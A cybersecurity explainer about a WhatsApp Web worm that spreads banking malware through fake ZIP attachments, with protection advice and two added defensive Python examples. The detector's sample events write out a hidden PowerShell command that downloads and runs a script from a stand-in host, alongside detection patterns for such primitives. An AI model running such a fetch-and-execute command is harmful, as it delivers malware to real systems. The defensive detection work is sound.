WhatsApp Worm Banking Malware: How It Spreads and How to Stay Safe

A new WhatsApp worm is infecting users by sending fake ZIP attachments that contain hidden malware designed to steal banking credentials. Once opened, it spreads automatically through the victim’s contacts, targeting Windows systems via WhatsApp Web. The campaign has hit users in Brazil the hardest, but experts warn it could spread globally.

A New Wave of Malware Targeting WhatsApp Users

Security researchers have uncovered a new WhatsApp worm banking malware campaign that tricks users into downloading and running infected ZIP files. Once the file is opened, the malware silently installs a banking trojan that steals login credentials, browser cookies, and session tokens.

The worm spreads by abusing WhatsApp Web sessions, sending the same malicious ZIP file to all contacts in the victim’s chat list. This method gives the campaign viral reach, using social trust to make the message look legitimate.

Researchers say the attack has been active since late September 2025 and primarily targets users in Brazil, though the infection technique could easily be reused elsewhere.

How the WhatsApp Worm Banking Malware Works

This campaign combines social engineering with automated propagation, making it especially dangerous. Here’s the breakdown:

  1. Malicious ZIP arrives via WhatsApp.
    The victim receives a ZIP file from a known contact through WhatsApp Web. The file is usually disguised as a receipt, invoice, or software update. Because it comes from a familiar name, users are more likely to trust it.
  2. Hidden payload inside.
    Inside the ZIP, a Windows shortcut (.lnk) or executable (.exe) file appears harmless but launches hidden PowerShell commands once opened.
  3. Downloader stage activates.
    The script connects to a remote server controlled by attackers and downloads additional payloads. These may include banking trojans, credential stealers, or spyware modules.
  4. Credential theft and session hijacking.
    The malware collects data from browsers, cookies, and saved passwords. It also captures active banking sessions and authentication tokens.
  5. Worm-like propagation.
    Using the compromised WhatsApp Web session, the malware automatically sends the same ZIP file to the victim’s contacts, continuing the infection chain.

This cycle repeats across networks and contacts, allowing the malware to spread faster than traditional phishing campaigns.
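The five steps above leave a small, recognisable trace in process-creation telemetry: a PowerShell started by an interactive parent such as explorer.exe (the double-clicked shortcut), run with a hidden window, an encoded command or a policy bypass, and then a second PowerShell that downloads and executes the next stage. The following Python is an added example, not code from the article or from any of the vendors it cites. It scores Sysmon-style process-creation events for that combination. The events are constructed samples embedded inline, the download host uses the reserved, non-resolving .invalid TLD, and the indicator names, weights and alert threshold are the example's own choices.

```python
import re

# Constructed Sysmon-style process-creation events (image, parent image,
# command line). Sample data for this example, not real telemetry; the
# download host uses the reserved, non-resolving .invalid TLD.
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"

SAMPLE_EVENTS = [
    {"pid": 4100, "image": EXPLORER, "parent": r"C:\Windows\userinit.exe",
     "cmd": "explorer.exe"},
    # Step 2: a shortcut unpacked from the chat-delivered ZIP is double-clicked,
    # so explorer.exe runs its target: a hidden, encoded PowerShell.
    {"pid": 4120, "image": POWERSHELL, "parent": EXPLORER,
     "cmd": "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass "
            "-EncodedCommand <base64 omitted in this constructed sample>"},
    # Step 3: the decoded script spawns a second PowerShell that fetches and
    # runs the next stage in memory.
    {"pid": 4133, "image": POWERSHELL, "parent": POWERSHELL,
     "cmd": "powershell.exe -nop -w hidden -c \"IEX((New-Object Net.WebClient)"
            ".DownloadString('http://stage.example.invalid/loader.ps1'))\""},
    # Benign: an administrator runs a maintenance script from a console.
    {"pid": 5200, "image": POWERSHELL, "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"powershell.exe -NoProfile -File C:\Scripts\rotate-logs.ps1"},
    # Benign: the browser hosting the WhatsApp Web session itself.
    {"pid": 5300, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": EXPLORER, "cmd": "chrome.exe --type=renderer"},
]

# Parents that indicate a user double-clicked something rather than a script
# or service starting PowerShell deliberately.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe",
                       "winrar.exe", "7zfm.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Command-line indicators with their weights (the example's own choices).
INDICATORS = {
    "hidden_window":      (2, re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)),
    "encoded_command":    (2, re.compile(r"-(e|ec|enc|encodedcommand)\s", re.I)),
    "policy_bypass":      (1, re.compile(r"-(ep|exec|executionpolicy)\s+bypass\b", re.I)),
    "download_primitive": (3, re.compile(r"downloadstring|downloadfile|invoke-webrequest|"
                                         r"\biwr\b|start-bitstransfer|\bcurl\b", re.I)),
    "inline_exec":        (2, re.compile(r"invoke-expression|\biex\b", re.I)),
    "staging_path":       (1, re.compile(r"\\(downloads|temp|appdata\\local\\temp)\\", re.I)),
}
PARENT_WEIGHTS = {"interactive_parent": 2, "powershell_spawns_powershell": 1}
ALERT_THRESHOLD = 4


def basename(path):
    """Final path component, lower-cased, for either separator."""
    return re.split(r"[\\/]", path)[-1].lower()


def score_event(event):
    """Return (score, matched indicator names) for one process-creation event.

    Non-PowerShell images score 0: the chain's observable pivot is the
    PowerShell launch, so everything else is ignored here.
    """
    if basename(event["image"]) not in POWERSHELL_IMAGES:
        return 0, []
    matched = [name for name, (_, rx) in INDICATORS.items() if rx.search(event["cmd"])]
    parent = basename(event["parent"])
    if parent in INTERACTIVE_PARENTS:
        matched.append("interactive_parent")
    elif parent in POWERSHELL_IMAGES:
        matched.append("powershell_spawns_powershell")
    score = sum(INDICATORS[m][0] if m in INDICATORS else PARENT_WEIGHTS[m] for m in matched)
    return score, matched


def detect(events, threshold=ALERT_THRESHOLD):
    """Return one alert per event whose indicator score reaches the threshold."""
    alerts = []
    for event in events:
        score, matched = score_event(event)
        if score >= threshold:
            alerts.append({"pid": event["pid"], "score": score, "indicators": matched})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"ALERT pid={alert['pid']} score={alert['score']} "
              f"indicators={', '.join(alert['indicators'])}")
```

Run against the samples, the two chain events alert (scores 7 and 8) while the administrator's scripted PowerShell and the browser itself score 0. The weights deliberately make a download-and-execute primitive alone almost enough to alert, because that is the step the rest of the chain depends on; in production, feed real Sysmon event 1 or Windows 4688 records with command-line auditing enabled, and tune the threshold against your own baseline of legitimate hidden-window PowerShell.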

Timeline of the WhatsApp Worm Banking Malware Incident

The WhatsApp worm banking malware campaign unfolded quickly over just two weeks, moving from isolated detections to widespread infections. Security firms tracked its evolution through a series of key milestones that show how fast the threat grew and how researchers responded. The timeline below highlights the major events that shaped this incident.

Date and event, with details / impact:

  • Sept 29, 2025 (First Detection): Researchers first spot the malicious ZIP file spreading through WhatsApp Web. The campaign appears to originate in Brazil.
  • Early Oct 2025 (Worm Confirmed): Cybersecurity analysts confirm the malware behaves like a self-propagating worm, automatically sending itself to contacts through compromised WhatsApp Web sessions.
  • Oct 4, 2025 (Technical Analysis by Trend Micro): Trend Micro identifies the variant as SORVEPOTEL, part of a broader campaign called Water Saci. It steals banking data and login tokens.
  • Oct 10, 2025 (Public Advisory by Sophos): Sophos releases a detailed report describing how the worm uses fake ZIP attachments, PowerShell scripts, and trusted contacts to spread.
  • Oct 13, 2025 (Infections Widen): Media outlets report hundreds of corporate systems in Brazil compromised. Banking trojans and data-stealing payloads confirmed.
  • Oct 14, 2025 (Deep-Dive Reports Released): Security blogs and CERTs publish full IoCs, infection maps, and command-and-control domains, warning the worm could spread globally.

Why This Attack Works So Well

The success of this malware lies in social engineering and automation. People are naturally inclined to trust messages from friends and coworkers. Attackers exploit that by hijacking trusted chats to deliver malware.

The WhatsApp worm banking malware is effective because it blends psychological manipulation, automation, and familiarity. It doesn’t rely on sophisticated exploits or zero-day vulnerabilities. Instead, it preys on how people naturally communicate and trust others online.

1. It uses social proof

Humans are wired to trust messages from people they know. When the malware sends a ZIP file from a familiar contact, users don’t question its authenticity. The attacker doesn’t need to craft convincing phishing emails or fake domains. A simple “check this out” message from a friend or coworker is enough to trigger curiosity.

2. It blurs personal and professional boundaries

Many professionals now use WhatsApp for work updates, document sharing, and team discussions. That crossover between personal and business communication gives attackers a perfect entry point. What begins as a harmless-looking chat can quickly turn into a corporate breach if opened on a work laptop.

3. It hides behind legitimate sessions

The worm doesn’t break into WhatsApp servers. Instead, it hijacks WhatsApp Web sessions that users have already authenticated. Since the malware acts within a legitimate, logged-in browser, it avoids raising alarms and bypasses security filters that usually monitor external traffic.

4. It automates the spread

Once the device is infected, the malware automatically sends itself to all the victim’s contacts. This self-propagating design removes the need for manual effort from the attacker. It’s fast, scalable, and difficult to contain. Even cautious users might click if they see the same file coming from multiple trusted contacts.

5. It exploits user habits

Most users rarely verify attachments before opening them. They assume that a file from a known person is safe. Attackers know this and design the file names to look routine — something like invoice_2025.zip or photo_album.zip. The sense of urgency or familiarity makes users act first and think later.

6. It evades detection for longer

Because the messages and attachments come from legitimate accounts, many security tools initially mark them as safe. Traditional spam filters don’t monitor WhatsApp traffic, and endpoint defenses may not flag ZIP files until they’re executed. This gives the worm more time to move laterally and collect data.

7. It targets global behavior

The attack model isn’t limited to Brazil or any specific region. It works anywhere WhatsApp is used for personal or work communication — which is nearly everywhere. The reliance on trust and convenience gives it universal appeal for cybercriminals and makes it hard for users to defend against.

In short, this attack succeeds because it turns human trust into a weapon. It doesn’t need advanced exploits or complex malware to succeed; it just needs people to click.

Who Is Affected

The WhatsApp worm banking malware primarily targets Windows users who use WhatsApp Web, but the actual impact goes far beyond individual users.

In Brazil, several organizations including financial institutions, small businesses, and government offices have already reported infections. The campaign takes advantage of how employees casually use personal messaging apps on office systems, which allows the worm to slip past traditional network defenses.

Once a single system is compromised, the malware can:

  • Spread laterally within local networks by accessing shared folders or cached credentials.
  • Harvest stored banking logins, browser cookies, and session tokens, which can be used to access enterprise dashboards or payment gateways.
  • Send malicious ZIPs to business or personal contacts, turning victims into unwilling distributors.

Researchers warn that this hybrid targeting approach, blending personal and enterprise attack surfaces, could soon appear outside Latin America. Countries with large WhatsApp user bases like India, Indonesia, and Mexico may be next.

Essentially, anyone using WhatsApp Web on a desktop or laptop without strict attachment controls is at risk. The overlap between personal and professional communication gives attackers an easy opening.

Why WhatsApp Is a Target

WhatsApp is one of the world’s most widely used messaging platforms, with over 2.7 billion active users. It has become a default channel for both personal and business communication, making it a valuable target for cybercriminals.

Attackers know users inherently trust contacts they know, especially in familiar chat threads. A message from a colleague or family member carrying a ZIP file doesn’t raise suspicion the way a random phishing email might. That sense of trust is exactly what attackers exploit.

The WhatsApp Web interface also adds a technical opportunity. Many users stay logged in for convenience, and messages sync automatically with their desktop browsers. This means malware doesn’t have to exploit a WhatsApp vulnerability; it simply hijacks the session and uses automation to send new messages that look like legitimate conversations.

From a cybercriminal’s point of view, the platform’s reach, speed, and trust factor make it an ideal channel for mass distribution. The worm spreads through real conversations, which helps it stay undetected longer and spread faster than traditional email-based attacks.

WhatsApp’s cross-device sync also blurs the line between work and personal use. Attackers take advantage of this to steal both corporate credentials and personal banking information in a single strike.

Signs You May Be Infected

If you suspect you’ve been exposed to this attack, look for these red flags:

  • You received and opened a suspicious ZIP file from WhatsApp.
  • Your WhatsApp contacts report receiving strange messages from you.
  • Your system shows unusual PowerShell activity or new scheduled tasks you did not create.
  • Your browser logs you out of accounts unexpectedly.
  • You notice unauthorized transactions in banking or payment apps.

If you see any of these, disconnect from the internet immediately and run a full malware scan.

How to Protect Yourself

For regular users

  • Don’t open ZIP files or attachments from chats unless you’re sure of the source. Always confirm by calling the sender.
  • Avoid running .lnk or .exe files from WhatsApp or email attachments.
  • Update Windows and browsers regularly to patch known vulnerabilities.
  • Use multi-factor authentication (MFA) for banking and social apps.
  • Install a trusted antivirus or endpoint security tool.

Steps for Removal and Recovery

If your device is already infected:

  1. Disconnect from Wi-Fi or LAN immediately.
  2. Run a full scan using updated antivirus or EDR software.
  3. Check for and delete any unknown startup items or scheduled tasks.
  4. Change all passwords, especially for banking and email accounts.
  5. Inform your bank if you suspect financial compromise.
  6. Reinstall Windows from a clean backup if necessary.

FAQs

Q1: Is this a vulnerability in WhatsApp?
No, the malware doesn’t exploit a flaw in WhatsApp. It takes advantage of user trust and WhatsApp Web sessions to spread malicious files.

Q2: Can Android or iPhone users be affected?
The current wave mainly targets Windows systems through WhatsApp Web. However, attackers could adapt it to mobile platforms in future variants.

Q3: What should I do if I opened the ZIP file?
Disconnect your device from the internet, run a full antivirus or EDR scan, and change all important passwords immediately. Inform your bank if you use online banking.

Q4: How does the worm spread so fast?
Once infected, the malware automatically sends itself to all contacts through the victim’s WhatsApp Web session. It uses trusted relationships to propagate quickly.

Q5: How can businesses protect themselves?
Organizations should monitor network traffic for suspicious PowerShell commands, limit WhatsApp Web usage on work devices, and block risky file types.
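The user-level advice above (don't run .lnk or .exe files from chat attachments) and the business-level advice here (block risky file types) can both be enforced wherever an attachment is seen before the user opens it, such as a mail or chat gateway or an endpoint download hook. The following Python is an added example, not code from the article or any vendor it cites. It inspects a ZIP without extracting it and flags executable members, document-looking double extensions such as invoice_2025.pdf.lnk, nested archives and encrypted members, returning a block/allow verdict. The sample archives are constructed in memory, and the extension lists and the policy are the example's own choices.

```python
import io
import zipfile
from pathlib import PureWindowsPath

# File types that Windows executes on double-click. Policy lists are the
# example's own choices; tune them to your environment.
EXECUTABLE_EXTS = {".exe", ".lnk", ".scr", ".com", ".pif", ".bat", ".cmd", ".js",
                   ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1", ".msi"}
ARCHIVE_EXTS = {".zip", ".rar", ".7z", ".iso", ".img"}
# Extensions placed in front of the real one (invoice.pdf.lnk) so the name
# looks like a document once Explorer hides the final extension.
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".jpeg", ".png", ".txt"}


def inspect_zip(data):
    """Return a list of (member name, reason) findings for one ZIP attachment.

    An empty list means nothing in the archive violates the policy above.
    """
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [("<archive>", "not a valid ZIP file")]
    findings = []
    with archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            # suffixes of "dir/invoice_2025.pdf.lnk" -> ['.pdf', '.lnk']
            suffixes = [s.lower() for s in PureWindowsPath(info.filename).suffixes]
            last = suffixes[-1] if suffixes else ""
            if last in EXECUTABLE_EXTS:
                findings.append((info.filename, f"executable member ({last})"))
                if len(suffixes) > 1 and suffixes[-2] in DECOY_EXTS:
                    findings.append((info.filename, "document-looking double extension"))
            elif last in ARCHIVE_EXTS:
                findings.append((info.filename, "nested archive"))
            elif not last:
                findings.append((info.filename, "no extension (cannot classify)"))
            # Bit 0 of the general-purpose flags marks an encrypted member,
            # which no gateway scanner can inspect.
            if info.flag_bits & 0x1:
                findings.append((info.filename, "encrypted member (cannot be scanned)"))
    return findings


def verdict(data):
    """'block' when any finding exists, otherwise 'allow'."""
    return "block" if inspect_zip(data) else "allow"


def build_sample(members):
    """Construct an in-memory ZIP from {name: bytes}; sample data for this example."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as archive:
        for name, payload in members.items():
            archive.writestr(name, payload)
    return buffer.getvalue()


# Constructed samples: the lure shape the article describes, a benign photo
# archive, and an archive that hides an executable inside a second ZIP.
LURE_SAMPLE = build_sample({
    "comprovante/invoice_2025.pdf.lnk": b"placeholder bytes, not a real shortcut",
    "comprovante/leia-me.txt": b"constructed note",
})
BENIGN_SAMPLE = build_sample({
    "photo_album/IMG_0001.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,
    "photo_album/IMG_0002.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,
})
NESTED_SAMPLE = build_sample({
    "docs/attachment.zip": build_sample({"setup.exe": b"MZ placeholder"}),
})

if __name__ == "__main__":
    for label, sample in (("lure", LURE_SAMPLE), ("benign", BENIGN_SAMPLE),
                          ("nested", NESTED_SAMPLE)):
        print(label, verdict(sample), inspect_zip(sample))
```

Two design points: the gate reads only the central directory, so it never writes a member to disk, and the double-extension check matters because Explorer never displays the .lnk extension, so invoice_2025.pdf.lnk appears to the user as invoice_2025.pdf. Nested archives and encrypted members are blocked rather than trusted, since a scanner that cannot see inside a file has no basis for allowing it; members with no extension are blocked for the same reason, which you may relax for known-benign cases.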

Q6: Can antivirus tools detect it?
Most updated antivirus and EDR solutions can detect related payloads. However, early-stage variants may still evade detection, so behavioral monitoring is essential.

Conclusion

The WhatsApp worm banking malware shows how easily social engineering and automation can merge into a powerful threat. It proves that even trusted platforms can become attack channels when users let their guard down. Staying safe means questioning unexpected attachments, maintaining regular software updates, and using layered security. Cyber awareness, not just antivirus tools, is the strongest defense against such evolving threats.

Author

  • Maya Pillai is a technology writer with over 20 years of experience. She specializes in cybersecurity, focusing on ransomware, endpoint protection, and online threats, making complex issues easy to understand for businesses and individuals.
